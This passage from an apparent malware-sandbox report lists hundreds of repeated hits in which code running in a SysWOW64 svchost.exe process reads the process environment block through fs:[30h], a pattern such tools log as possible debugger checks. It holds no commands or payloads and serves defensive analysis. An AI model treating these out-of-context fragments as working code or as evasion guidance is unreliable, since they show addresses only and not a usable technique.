            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03650310 mov ecx, dword ptr fs:[00000030h] 9_2_03650310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h] 9_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h] 9_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h] 9_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h] 9_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h] 9_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h] 9_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h] 9_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h] 9_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0364E3F0 mov eax, dword ptr fs:[00000030h] 9_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0364E3F0 mov eax, dword ptr fs:[00000030h] 9_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0364E3F0 mov eax, dword ptr fs:[00000030h] 9_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036663FF mov eax, dword ptr fs:[00000030h] 9_2_036663FF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036EC3CD mov eax, dword ptr fs:[00000030h] 9_2_036EC3CD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 9_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 9_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 9_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 9_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 9_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 9_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036383C0 mov eax, dword ptr fs:[00000030h] 9_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036383C0 mov eax, dword ptr fs:[00000030h] 9_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036383C0 mov eax, dword ptr fs:[00000030h] 9_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036383C0 mov eax, dword ptr fs:[00000030h] 9_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B63C0 mov eax, dword ptr fs:[00000030h] 9_2_036B63C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DE3DB mov eax, dword ptr fs:[00000030h] 9_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DE3DB mov eax, dword ptr fs:[00000030h] 9_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DE3DB mov ecx, dword ptr fs:[00000030h] 9_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DE3DB mov eax, dword ptr fs:[00000030h] 9_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036D43D4 mov eax, dword ptr fs:[00000030h] 9_2_036D43D4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036D43D4 mov eax, dword ptr fs:[00000030h] 9_2_036D43D4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362E388 mov eax, dword ptr fs:[00000030h] 9_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362E388 mov eax, dword ptr fs:[00000030h] 9_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362E388 mov eax, dword ptr fs:[00000030h] 9_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365438F mov eax, dword ptr fs:[00000030h] 9_2_0365438F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365438F mov eax, dword ptr fs:[00000030h] 9_2_0365438F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03628397 mov eax, dword ptr fs:[00000030h] 9_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03628397 mov eax, dword ptr fs:[00000030h] 9_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03628397 mov eax, dword ptr fs:[00000030h] 9_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03634260 mov eax, dword ptr fs:[00000030h] 9_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03634260 mov eax, dword ptr fs:[00000030h] 9_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03634260 mov eax, dword ptr fs:[00000030h] 9_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362826B mov eax, dword ptr fs:[00000030h] 9_2_0362826B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h] 9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h] 9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h] 9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h] 9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h] 9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h] 9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h] 9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h] 9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h] 9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h] 9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h] 9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h] 9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B8243 mov eax, dword ptr fs:[00000030h] 9_2_036B8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B8243 mov ecx, dword ptr fs:[00000030h] 9_2_036B8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0370625D mov eax, dword ptr fs:[00000030h] 9_2_0370625D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362A250 mov eax, dword ptr fs:[00000030h] 9_2_0362A250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03636259 mov eax, dword ptr fs:[00000030h] 9_2_03636259
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036EA250 mov eax, dword ptr fs:[00000030h] 9_2_036EA250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036EA250 mov eax, dword ptr fs:[00000030h] 9_2_036EA250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362823B mov eax, dword ptr fs:[00000030h] 9_2_0362823B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036402E1 mov eax, dword ptr fs:[00000030h] 9_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036402E1 mov eax, dword ptr fs:[00000030h] 9_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036402E1 mov eax, dword ptr fs:[00000030h] 9_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 9_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 9_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 9_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 9_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 9_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_037062D6 mov eax, dword ptr fs:[00000030h] 9_2_037062D6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036402A0 mov eax, dword ptr fs:[00000030h] 9_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036402A0 mov eax, dword ptr fs:[00000030h] 9_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C62A0 mov eax, dword ptr fs:[00000030h] 9_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C62A0 mov ecx, dword ptr fs:[00000030h] 9_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C62A0 mov eax, dword ptr fs:[00000030h] 9_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C62A0 mov eax, dword ptr fs:[00000030h] 9_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C62A0 mov eax, dword ptr fs:[00000030h] 9_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C62A0 mov eax, dword ptr fs:[00000030h] 9_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366E284 mov eax, dword ptr fs:[00000030h] 9_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366E284 mov eax, dword ptr fs:[00000030h] 9_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B0283 mov eax, dword ptr fs:[00000030h] 9_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B0283 mov eax, dword ptr fs:[00000030h] 9_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B0283 mov eax, dword ptr fs:[00000030h] 9_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03704164 mov eax, dword ptr fs:[00000030h] 9_2_03704164
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03704164 mov eax, dword ptr fs:[00000030h] 9_2_03704164
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C4144 mov eax, dword ptr fs:[00000030h] 9_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C4144 mov eax, dword ptr fs:[00000030h] 9_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C4144 mov ecx, dword ptr fs:[00000030h] 9_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C4144 mov eax, dword ptr fs:[00000030h] 9_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C4144 mov eax, dword ptr fs:[00000030h] 9_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362C156 mov eax, dword ptr fs:[00000030h] 9_2_0362C156
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C8158 mov eax, dword ptr fs:[00000030h] 9_2_036C8158
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03636154 mov eax, dword ptr fs:[00000030h] 9_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03636154 mov eax, dword ptr fs:[00000030h] 9_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03660124 mov eax, dword ptr fs:[00000030h] 9_2_03660124
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DE10E mov eax, dword ptr fs:[00000030h] 9_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DE10E mov ecx, dword ptr fs:[00000030h] 9_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DE10E mov eax, dword ptr fs:[00000030h] 9_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DE10E mov eax, dword ptr fs:[00000030h] 9_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DE10E mov ecx, dword ptr fs:[00000030h] 9_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DE10E mov eax, dword ptr fs:[00000030h] 9_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DE10E mov eax, dword ptr fs:[00000030h] 9_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DE10E mov ecx, dword ptr fs:[00000030h] 9_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DE10E mov eax, dword ptr fs:[00000030h] 9_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DE10E mov ecx, dword ptr fs:[00000030h] 9_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DA118 mov ecx, dword ptr fs:[00000030h] 9_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DA118 mov eax, dword ptr fs:[00000030h] 9_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DA118 mov eax, dword ptr fs:[00000030h] 9_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DA118 mov eax, dword ptr fs:[00000030h] 9_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036F0115 mov eax, dword ptr fs:[00000030h] 9_2_036F0115
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_037061E5 mov eax, dword ptr fs:[00000030h] 9_2_037061E5
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036601F8 mov eax, dword ptr fs:[00000030h] 9_2_036601F8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036F61C3 mov eax, dword ptr fs:[00000030h] 9_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036F61C3 mov eax, dword ptr fs:[00000030h] 9_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036AE1D0 mov eax, dword ptr fs:[00000030h] 9_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036AE1D0 mov eax, dword ptr fs:[00000030h] 9_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036AE1D0 mov ecx, dword ptr fs:[00000030h] 9_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036AE1D0 mov eax, dword ptr fs:[00000030h] 9_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036AE1D0 mov eax, dword ptr fs:[00000030h] 9_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03670185 mov eax, dword ptr fs:[00000030h] 9_2_03670185
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036EC188 mov eax, dword ptr fs:[00000030h] 9_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036EC188 mov eax, dword ptr fs:[00000030h] 9_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D4180 mov eax, dword ptr fs:[00000030h]9_2_036D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D4180 mov eax, dword ptr fs:[00000030h]9_2_036D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B019F mov eax, dword ptr fs:[00000030h]9_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B019F mov eax, dword ptr fs:[00000030h]9_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B019F mov eax, dword ptr fs:[00000030h]9_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B019F mov eax, dword ptr fs:[00000030h]9_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362A197 mov eax, dword ptr fs:[00000030h]9_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362A197 mov eax, dword ptr fs:[00000030h]9_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362A197 mov eax, dword ptr fs:[00000030h]9_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365C073 mov eax, dword ptr fs:[00000030h]9_2_0365C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03632050 mov eax, dword ptr fs:[00000030h]9_2_03632050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B6050 mov eax, dword ptr fs:[00000030h]9_2_036B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362A020 mov eax, dword ptr fs:[00000030h]9_2_0362A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362C020 mov eax, dword ptr fs:[00000030h]9_2_0362C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C6030 mov eax, dword ptr fs:[00000030h]9_2_036C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B4000 mov ecx, dword ptr fs:[00000030h]9_2_036B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D2000 mov eax, dword ptr fs:[00000030h]9_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D2000 mov eax, dword ptr fs:[00000030h]9_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D2000 mov eax, dword ptr fs:[00000030h]9_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D2000 mov eax, dword ptr fs:[00000030h]9_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D2000 mov eax, dword ptr fs:[00000030h]9_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D2000 mov eax, dword ptr fs:[00000030h]9_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D2000 mov eax, dword ptr fs:[00000030h]9_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D2000 mov eax, dword ptr fs:[00000030h]9_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364E016 mov eax, dword ptr fs:[00000030h]9_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364E016 mov eax, dword ptr fs:[00000030h]9_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364E016 mov eax, dword ptr fs:[00000030h]9_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364E016 mov eax, dword ptr fs:[00000030h]9_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]9_2_0362A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036380E9 mov eax, dword ptr fs:[00000030h]9_2_036380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B60E0 mov eax, dword ptr fs:[00000030h]9_2_036B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362C0F0 mov eax, dword ptr fs:[00000030h]9_2_0362C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036720F0 mov ecx, dword ptr fs:[00000030h]9_2_036720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B20DE mov eax, dword ptr fs:[00000030h]9_2_036B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036280A0 mov eax, dword ptr fs:[00000030h]9_2_036280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C80A8 mov eax, dword ptr fs:[00000030h]9_2_036C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F60B8 mov eax, dword ptr fs:[00000030h]9_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F60B8 mov ecx, dword ptr fs:[00000030h]9_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363208A mov eax, dword ptr fs:[00000030h]9_2_0363208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03638770 mov eax, dword ptr fs:[00000030h]9_2_03638770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366674D mov esi, dword ptr fs:[00000030h]9_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366674D mov eax, dword ptr fs:[00000030h]9_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366674D mov eax, dword ptr fs:[00000030h]9_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03630750 mov eax, dword ptr fs:[00000030h]9_2_03630750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036BE75D mov eax, dword ptr fs:[00000030h]9_2_036BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672750 mov eax, dword ptr fs:[00000030h]9_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672750 mov eax, dword ptr fs:[00000030h]9_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B4755 mov eax, dword ptr fs:[00000030h]9_2_036B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366C720 mov eax, dword ptr fs:[00000030h]9_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366C720 mov eax, dword ptr fs:[00000030h]9_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366273C mov eax, dword ptr fs:[00000030h]9_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366273C mov ecx, dword ptr fs:[00000030h]9_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366273C mov eax, dword ptr fs:[00000030h]9_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AC730 mov eax, dword ptr fs:[00000030h]9_2_036AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366C700 mov eax, dword ptr fs:[00000030h]9_2_0366C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03630710 mov eax, dword ptr fs:[00000030h]9_2_03630710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03660710 mov eax, dword ptr fs:[00000030h]9_2_03660710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036527ED mov eax, dword ptr fs:[00000030h]9_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036527ED mov eax, dword ptr fs:[00000030h]9_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036527ED mov eax, dword ptr fs:[00000030h]9_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036BE7E1 mov eax, dword ptr fs:[00000030h]9_2_036BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036347FB mov eax, dword ptr fs:[00000030h]9_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036347FB mov eax, dword ptr fs:[00000030h]9_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363C7C0 mov eax, dword ptr fs:[00000030h]9_2_0363C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B07C3 mov eax, dword ptr fs:[00000030h]9_2_036B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036307AF mov eax, dword ptr fs:[00000030h]9_2_036307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E47A0 mov eax, dword ptr fs:[00000030h]9_2_036E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D678E mov eax, dword ptr fs:[00000030h]9_2_036D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F866E mov eax, dword ptr fs:[00000030h]9_2_036F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F866E mov eax, dword ptr fs:[00000030h]9_2_036F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366A660 mov eax, dword ptr fs:[00000030h]9_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366A660 mov eax, dword ptr fs:[00000030h]9_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03662674 mov eax, dword ptr fs:[00000030h]9_2_03662674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364C640 mov eax, dword ptr fs:[00000030h]9_2_0364C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364E627 mov eax, dword ptr fs:[00000030h]9_2_0364E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03666620 mov eax, dword ptr fs:[00000030h]9_2_03666620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03668620 mov eax, dword ptr fs:[00000030h]9_2_03668620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363262C mov eax, dword ptr fs:[00000030h]9_2_0363262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AE609 mov eax, dword ptr fs:[00000030h]9_2_036AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364260B mov eax, dword ptr fs:[00000030h]9_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364260B mov eax, dword ptr fs:[00000030h]9_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364260B mov eax, dword ptr fs:[00000030h]9_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364260B mov eax, dword ptr fs:[00000030h]9_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364260B mov eax, dword ptr fs:[00000030h]9_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364260B mov eax, dword ptr fs:[00000030h]9_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364260B mov eax, dword ptr fs:[00000030h]9_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672619 mov eax, dword ptr fs:[00000030h]9_2_03672619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AE6F2 mov eax, dword ptr fs:[00000030h]9_2_036AE6F2
